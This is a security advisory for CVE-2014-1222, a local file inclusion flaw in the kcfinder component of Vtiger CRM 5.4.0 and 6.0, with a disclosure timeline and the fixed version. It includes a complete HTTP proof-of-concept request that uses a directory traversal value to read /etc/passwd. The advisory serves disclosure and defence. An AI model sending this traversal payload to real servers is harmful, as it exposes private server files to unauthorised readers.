Lucene search

K
zdtPortcullis1337DAY-ID-22020
HistoryMar 12, 2014 - 12:00 a.m.

Vtiger CRM 5.4.0, 6.0 RC, 6.0.0 GA - Local File Inclusion Vulnerability

2014-03-1200:00:00
Portcullis
0day.today
40

EPSS

0.053

Percentile

93.1%

Vtiger CRM versions 5.4.0, 6.0 RC, and 6.0.0 GA suffer from a local file inclusion vulnerability.

CVE:    CVE-2014-1222
Vendor:     Vtiger
Product:    CRM
Affected version:   Vtiger 5.4.0, 6.0 RC & 6.0.0 GA
Fixed version:  Vtiger 6.0.0 Security patch 1
Reported by:    Jerzy Kramarz
Details:
 
A local file inclusion vulnerability was discovered in the ‘kcfinder’ component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose contents of arbitrary files.
 
The following request is a Proof-of-Concept for retrieving /etc/passwd file from remote system.
 
POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.56.103
Proxy-Connection: keep-alive
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.56.103/vtigercrm6rc2/kcfinder/browse.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4
Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
 
dir=files&file=/../../../../../../../../../../../etc/passwd
 
Note: In order to exploit this vulnerability an attacker has to be authenticated.
Impact:
 
This vulnerability gives an attacker the ability to read local files from the server filesystem.
Exploit:
 
Exploit code is not required.
 
Vendor status:
23/12/2013  Advisory created
03/01/2014  Vendor contacted
14/01/2014  CVE obtained
27/01/2014  Vendor contact reattempted
10/02/2014  Vendor working on a fix
12/02/2014  Fix released
13/02/2014  Fix confirmed
11/03/2014  Published

#  0day.today [2018-01-02]  #